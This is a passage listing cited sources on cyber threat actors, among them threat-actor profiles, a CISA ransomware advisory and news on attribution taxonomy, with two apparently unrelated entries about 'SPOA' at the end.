- KnowBe4 Hires Fake North Korean IT Worker, Catches New Employee Planting Malware, accessed June 4, 2025, https://www.securityweek.com/knowbe4-hires-fake-north-korean-it-worker-catches-new-employee-planting-malware/
- Threat Actor Profile – Shathak malware group – Outpost24, accessed June 4, 2025, https://outpost24.com/blog/threat-actor-profile-shathak/
- Threat Actor Profile – GhostSec – Outpost24, accessed June 4, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
- #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed June 4, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
- Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy, accessed June 4, 2025, https://www.cybersecuritydive.com/news/microsoft-crowdstrike-other-cyber-firms-collaborate-on-threat-actor-taxon/749614/
- CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution | CyberScoop, accessed June 4, 2025, https://cyberscoop.com/crowdstrike-microsoft-threat-group-attribution-initiative/
- Last Year in Ransomware: Top Ransomware Groups and Emerging Threat Actors – Halcyon, accessed June 4, 2025, https://www.halcyon.ai/blog/last-year-in-ransomware-top-ransomware-groups-and-emerging-threat-actors
- FBI warns of cyber actors exploiting end-of-life routers | AHA News, accessed June 4, 2025, https://www.aha.org/news/headline/2025-05-20-fbi-warns-cyber-actors-exploiting-end-life-routers
- SEC Announces Cyber and Emerging Technologies Unit to Protect Retail Investors, accessed June 4, 2025, https://www.sec.gov/newsroom/press-releases/2025-42
- Single Point of Access (SPOA) | Mental Health – | Erie County, accessed June 4, 2025, https://www3.erie.gov/mentalhealth/single-point-access-spoa
- Acquisitive Crime Strategy – Scottish Plant Owners Association, accessed June 4, 2025, https://www.spoa.org.uk/download_file/view/1173